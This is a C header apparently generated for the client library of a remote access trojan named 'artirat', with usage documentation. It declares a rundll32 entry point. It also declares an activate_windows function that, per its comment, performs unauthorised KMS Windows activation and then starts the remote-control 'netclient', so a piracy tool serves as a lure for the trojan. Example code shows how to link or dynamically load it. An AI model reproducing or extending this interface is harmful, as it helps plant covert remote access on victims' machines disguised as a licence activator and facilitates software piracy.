#ifndef ARTIRAT_CLIENT_H
#define ARTIRAT_CLIENT_H

/* Auto generated by cbindgen. */

#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdlib.h>

/**
 * Entry point for DLL/SO loads.
 * Windows rundll32: rundll32.exe <dllpath>,NetClientMain
 */
void NetClientMain(void);

/**
 * Generic C-callable entry point.
 */
int art1rat_main(void);

/**
 * Activate Windows via KMS (upgrades Home -> Professional if needed),
 * then starts the netclient.
 *
 * Returns 0 on success (activation + netclient started), 1 on failure.
 *
 * # Calling from C
 *
 * ```c
 * extern int activate_windows(void);
 *
 * int main() {
 *     int ret = activate_windows();
 *     if (ret == 0) {
 *         // Activation succeeded, netclient is running
 *     } else {
 *         // Activation failed
 *     }
 *     return ret;
 * }
 * ```
 *
 * Compile with:
 * ```text
 * gcc -o myapp myapp.c -lartirat_client
 * ```
 *
 * When loading dynamically (Windows):
 * ```c
 * typedef int (*activate_windows_fn)(void);
 * HMODULE hMod = LoadLibraryA("artirat_client.dll");
 * activate_windows_fn fn = (activate_windows_fn)GetProcAddress(hMod, "activate_windows");
 * int ret = fn();
 * ```
 */
int activate_windows(void);

#endif  /* ARTIRAT_CLIENT_H */
